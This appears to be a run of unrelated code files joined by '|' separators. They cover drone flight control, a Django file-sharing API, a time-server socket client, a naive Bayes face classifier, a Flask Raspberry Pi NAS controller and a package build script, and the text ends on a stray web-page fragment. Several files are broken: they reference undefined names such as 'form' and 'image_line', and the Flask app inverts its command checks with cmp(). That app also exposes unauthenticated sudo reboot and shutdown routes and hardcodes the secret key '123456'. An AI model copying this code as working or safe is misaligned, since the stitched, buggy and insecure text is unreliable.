The code also sets the yaw (MAV_CMD_CONDITION_YAW) using the `set_yaw()` method in each segment
so that the front of the vehicle points in the direction of travel
"""
#Set up velocity vector to map to each direction.
# vx > 0 => fly North
# vx < 0 => fly South
NORTH = 0.5
SOUTH = -0.5
# Note for vy:
# vy > 0 => fly East
# vy < 0 => fly West
EAST = 0.5
WEST = -0.5
# Note for vz:
# vz < 0 => ascend
# vz > 0 => descend
UP = -0.5
DOWN = 0.5
# Set duration for each segment.
DURATION_NORTH_SEC = 4
DURATION_SOUTH_SEC = 4
DURATION_EAST_SEC = 4
DURATION_WEST_SEC = 4
# Control path using velocity commands
print("Point the vehicle to a specific direction, then moves using SET_POSITION_TARGET_LOCAL_NED and velocity parameters")
print("Yaw 0 absolute (North)")
condition_yaw(0)
send_ned_velocity(0, 0, 0, 1)
print("Velocity North")
send_ned_velocity(NORTH, 0, 0, DURATION_NORTH_SEC)
send_ned_velocity(0, 0, 0, 1)
print("Yaw 90 absolute (East)")
condition_yaw(90)
print("Velocity East")
send_ned_velocity(0, EAST, 0, DURATION_EAST_SEC)
send_ned_velocity(0, 0, 0, 1)
print("Yaw 180 absolute (South)")
condition_yaw(180)
print("Velocity South")
send_ned_velocity(SOUTH, 0, 0, DURATION_SOUTH_SEC)
send_ned_velocity(0, 0, 0, 1)
print("Yaw 270 absolute (West)")
condition_yaw(270)
print("Velocity West")
send_ned_velocity(0, WEST, 0, DURATION_WEST_SEC)
send_ned_velocity(0, 0, 0, 1)
#######################################
# Main program starts here
#######################################
try:
# If using SITL: Take off in GUIDED_NOGPS mode.
if sitl is not None:
arm_and_takeoff_nogps(20)
print("Hold position for 3 seconds")
set_attitude(duration = 3)
# Wait until the RC channel is turned on and the corresponding channel is switch
print("Starting autonomous control...")
while True:
if (vehicle.mode.name == "LOITER") and (rc_channel_value > rc_control_thres):
pos_control_align_north_and_move_square()
elif (vehicle.mode.name == "GUIDED") and (rc_channel_value > rc_control_thres):
vel_control_align_north_and_move_square()
else:
print("Checking rc channel:", rc_control_channel, ", current value:", rc_channel_value, ", threshold to start: ", rc_control_thres)
time.sleep(1)
# print("Setting LAND mode...")
# vehicle.mode = VehicleMode("LAND")
# time.sleep(1)
# Close vehicle object before exiting script
print("Close vehicle object")
vehicle.close()
# Shut down simulator if it was started.
if sitl is not None:
sitl.stop()
print("Completed")
except KeyboardInterrupt:
vehicle.close()
print("Vehicle object closed.")
sys.exit()
|
import os
from datetime import datetime
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from rest_framework.authentication import TokenAuthentication
from rest_framework.parsers import FileUploadParser, JSONParser
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from core.common import UploadSummaryMixin
from core.models import Upload
from core.permissions import HasProperPassphrase
from core.serializers import (
SummarySerializer,
UploadSerializer,
UploadSuccessSerializer,
)
class UploadAPIView(APIView):
"""
Handles creating new Upload entries in the DB.
This endpoints accepts either an application/json request with a JSON body and a URL key,
or a file with the appropriate content-type set.
Return 201 on successful creation or 400 for validation errors.
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
# FileUploadParser accepts all MIME types, so it needs
# to be second to give JSONParser a chance.
parser_classes = (JSONParser, FileUploadParser)
def put(self, request):
serializer = UploadSerializer(data=request.data)
serializer.is_valid(raise_exception=True) # Bail out early
if serializer.validated_data["file"] is not None:
file_obj = serializer.validated_data["file"]
upload = Upload()
upload.file = file_obj
upload.save()
else:
upload = Upload()
upload.url = serializer.data["url"]
upload.save()
serializer = UploadSuccessSerializer(upload)
return Response(serializer.data, status=201)
class AccessAPIView(APIView):
"""
Asks for a password and serves the file or redirects to the given URL.
"""
permission_classes = [HasProperPassphrase]
def get(self, request, pk):
obj = get_object_or_404(Upload, pk=pk, expires_at__gt=datetime.now())
self.check_object_permissions(request, obj)
# Increment attempt counter.
form.instance.successful_attempts = F("successful_attempts") + 1
if obj.file:
file_path = obj.file.path
with open(file_path, "rb") as f_out:
response = HttpResponse(f_out.read())
response[
"Content-Disposition"
] = "attachment; filename=" + os.path.basename(file_path)
return response
else:
return Response({"url": obj.url})
class SummaryAPIView(APIView, UploadSummaryMixin):
"""
Displays some statistics on the submitted uploads.
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request):
entries = self.get_summary()
serializer = SummarySerializer(entries)
return Response(serializer.data)
|
#!/usr/bin/env python
import socket
with socket.socket(socket.AF_INET , socket.SOCK_STREAM) as s:
host = "time.nist.gov"
port = 13
s.connect ((host , port))
s.sendall(b'')
time=str(s.recv (4096) , 'utf -8')
print(time) |
sum = 0
for i in xrange(1, 101):
sum += i
print sum
lst = xrange(1, 101)
def add(x, y):
return x + y
print reduce(add, lst)
print reduce((lambda x, y: x + y), xrange(1, 101))
|
import numpy as np
import math
import matplotlib.pyplot as plt
class Bayesian_Model_Face:
def __init__(self):
self.training_classes =
[
[{'#':0, ' ':0} for i in range(60)]
for i in range(70)]
self.training_labels = []
self.testing_classes = [
[
[' ' for i in range(60)]
for i in range(70)]
for i in range(150)]
self.testing_labels = []
self.confusion_matrix = np.zeros((10, 10))
self.count = np.zeros(10) # count of appearances of each number in the training sample
self.priors = np.zeros(10)
def parse_file(self, trainfile_name, trainlabel_name, testfile_name, testlabel_name, smooth_factor):
trainfile = open(trainfile_name, 'r')
trainlabel = open(trainlabel_name, 'r')
for line in trainlabel:
for ch in line:
if ch.isdigit():
self.training_labels.append(int(ch))
for label in self.training_labels:
self.count[label] += 1
for i in range(70):
image_line = trainfile.readline()
for j in range(len(image_line)):
self.training_classes[label][i][j][image_line[j]] += 1
trainfile.close()
self.laplace_smooth(smooth_factor)
self.prior()
testfile = open(testfile_name, 'r')
testlabel = open(testlabel_name, 'r')
for line in testlabel:
for ch in line:
if ch.isdigit():
self.testing_labels.append(int(ch))
for idx in range(len(self.testing_labels)):
for i in range(70):
image_line = testfile.readline()
print(len(image_line))
for j in range(len(image_line)):
self.testing_classes[idx][i][j] = image_line[j]
testfile.close()
def laplace_smooth(self, factor):
for num in range(10):
if self.count[num] > 0:
denom = math.log2(self.count[num] + factor*2)
else:
denom = float('-inf')
for i in range(70):
for j in range(len(image_line)):
for pixel in self.training_classes[num][i][j]:
self.training_classes[num][i][j][pixel] = math.log2(self.training_classes[num][i][j][pixel] + factor) - denom
def prior(self):
total_count = sum(self.count)
self.priors = [num/total_count for num in self.count]
def test(self):
self.parse_file('./facedata/facedatatrain', './facedata/facedatatrainlabels', './facedata/facedatatest', './facedata/facedatatestlabels', 1)
predictions = []
correct_counts = [0 for i in range(10)]
total_counts = [0 for i in range(10)]
correct = 0
each = 0
line = 0
largest_posterior = [[float('-inf'), " "] for i in range(10)]
smallest_posterior = [[float('inf'), " "] for i in range(10)]
for label in self.testing_labels:
maxi = float('-inf')
mini = float('inf')
predicted = 0
for each_possibility in range(10):
possibility = math.log2(self.priors[each_possibility])
for i in range(70):
for j in range(32):
pixel = self.testing_classes[each][i][j]
possibility += self.training_classes[each_possibility][i][j][pixel]
if possibility > maxi:
predicted = each_possibility
maxi = possibility
if possibility < mini:
mini = possibility
predictions.append(predicted)
if maxi > largest_posterior[label][0]:
largest_posterior[label][0] = maxi
largest_posterior[label][1] = line
if mini < smallest_posterior[label][0]:
smallest_posterior[label][0] = mini
smallest_posterior[label][1] = line
self.confusion_matrix[predicted][label] += 1
if label == predicted:
correct += 1
correct_counts[label] += 1
total_counts[label] += 1
each += 1
line += 33
correct_prec = correct / each
for i in range(10):
for j in range(10):
num = self.confusion_matrix[i][j]
self.confusion_matrix[i][j] = num/total_counts[j]
print('For each digit, show the test examples from that class that have the highest and lowest posterior probabilities according to your classifier.')
print(largest_posterior)
print(smallest_posterior)
print('Classification Rate For Each Digit:')
for i in range(10):
print(i, correct_counts[i]/total_counts[i])
print('Confusion Matrix:')
for i in range(10):
print(self.confusion_matrix[i])
print(predictions)
print(correct_prec)
confusion_tuple = [((i, j), self.confusion_matrix[i][j]) for j in range(10) for i in range(10)]
confusion_tuple = list(filter(lambda x: x[0][0] != x[0][1], confusion_tuple))
confusion_tuple.sort(key = lambda x: -x[1])
for i in range(4):
feature1_pre = self.training_classes[confusion_tuple[i][0][0]]
feature1 = [[chardict['1'] for chardict in row] for row in feature1_pre]
feature2_pre = self.training_classes[confusion_tuple[i][0][1]]
feature2 = [[chardict['1'] for chardict in row] for row in feature2_pre]
fig = [None for k in range(3)]
axes = [None for k in range(3)]
heatmap = [None for k in range(3)]
features = [feature1,feature2, list(np.array(feature1) - np.array(feature2))]
for k in range(3):
fig[k], axes[k] = plt.subplots()
heatmap[k] = axes[k].pcolor(features[k], cmap="jet")
axes[k].invert_yaxis()
axes[k].xaxis.tick_top()
plt.tight_layout()
plt.colorbar(heatmap[k])
plt.show()
# plt.savefig('src/binaryheatmap%.0f%d.png' % (i + 1, k + 1) )
|
-X FMLP -Q 0 -L 3 89 300
-X FMLP -Q 0 -L 3 79 300
-X FMLP -Q 0 -L 3 69 300
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 46 175
-X FMLP -Q 1 -L 2 42 150
-X FMLP -Q 1 -L 2 41 125
-X FMLP -Q 1 -L 2 38 125
-X FMLP -Q 2 -L 1 36 400
-X FMLP -Q 2 -L 1 24 150
-X FMLP -Q 2 -L 1 24 125
-X FMLP -Q 3 -L 1 14 125
-X FMLP -Q 3 -L 1 9 100
-X FMLP -Q 3 -L 1 8 100
|
#Purpose: manipulate data for plotting of Pressure vs Dilitation
from Tkinter import Tk
from tkFileDialog import askopenfilename
Tk().withdraw()
###############################################################################
filename = askopenfilename()
print "Working with file:", filename
scale = input('What modulo do you want to manipulate the data? ')
data = []
with open(filename) as inputfile:
for line in inputfile:
data.append(line.strip().split())
###############################################################################
#Access data from columns 5 (avg pressure) and 9 (volume)
press_vol_data = []
for i in range(len(data)):
press_vol_data.append([data[i][4],data[i][8]])
print press_vol_data
#Apply the scale to clean data
press_vol_data_scale = []
for i in range(len(press_vol_data)):
if i%scale == 0:
press_vol_data_scale.append(press_vol_data[i])
print len(press_vol_data_scale)
print press_vol_data_scale
#################################################################################
dataFile = open("data_scale"+str(scale)+".txt", 'w')
for i in range(len(press_vol_data_scale)):
dataFile.write("\t".join(press_vol_data_scale[i])+'\n')
print "All done!"
|
from flask import Flask
from flask import request
from flask import make_response
from werkzeug import secure_filename
from flask import url_for
from flask import render_template
from flask import send_from_directory
import os
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = '/Users/qylk/'
app.secret_key = '123456'
@app.route('/')
def index():
return 'Hello Raspberry!'
@app.errorhandler(404)
def page_not_found(error):
return 'page_not_found', 404
@app.route('/disk/<command>')
def disk_mount(command):
if cmp(command, 'mount'):
output = os.popen('sudo mount /dev/sda1 /media/pi/nas')
elif cmp(command, 'unmount'):
output = os.popen('sudo unmount /dev/sda1')
else:
return 'command not recognized'
print output.read()
@app.route('/dlna/<command>')
def dlna(command):
if cmp(command, 'start'):
output = os.popen('sudo service minidlna start')
elif cmp(command, 'stop'):
output = os.popen('sudo service minidlna stop')
else:
return "command not recognized"
print output.read()
@app.route('/reboot')
def reboot():
output = os.popen('sudo reboot')
print output.read()
@app.route('/shutdown')
def shutdown():
output = os.popen('sudo shutdown -h now')
print output.read()
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
the_file = request.files['file']
if the_file:
filename = secure_filename(the_file.filename)
the_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return 'upload success!'
return render_template('upload.html')
@app.route('/files/<filename>')
def uploaded_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
# =============test===========================
@app.route('/post/<int:post_id>')
def show_post(post_id):
# show the post with the given id, the id is an integer
return 'Post %d' % post_id
@app.route('/cookie')
def cookie():
resp = make_response(render_template('hello.html', name='qylk'))
resp.set_cookie('username', 'qylk')
return resp
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
pass
else:
pass
@app.route('/file')
def file():
# show the post with the given id, the id is an integer
return url_for('static', filename='style.css')
@app.route('/hello/<name>')
def hello(name=None):
return render_template('hello.html', name=name)
if __name__ == '__main__':
app.run(debug=True)
|
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import pythonmodules
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
from pisi.actionsapi import shelltools
WorkDir="setuptools-%s" % get.srcVERSION()
def setup():
shelltools.makedirs("python3")
shelltools.copytree("../setuptools-%s" % get.srcVERSION(), "%s/python3" % get.workDIR())
def install():
#pythonmodules.install()
#pisitools.remove("/usr/lib/%s/site-packages/setuptools/*.exe" % get.curPYTHON())
shelltools.cd("%s/python3" % get.workDIR())
pythonmodules.install(pyVer = "3")
#pisitools.remove("/usr/lib/python3.4/site-packages/setuptools/*.exe")
pisitools.rename("/usr/bin/easy_install", "py3easy-install")
#avoid python-setuptools conflict
pisitools.removeDir("/usr/share") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.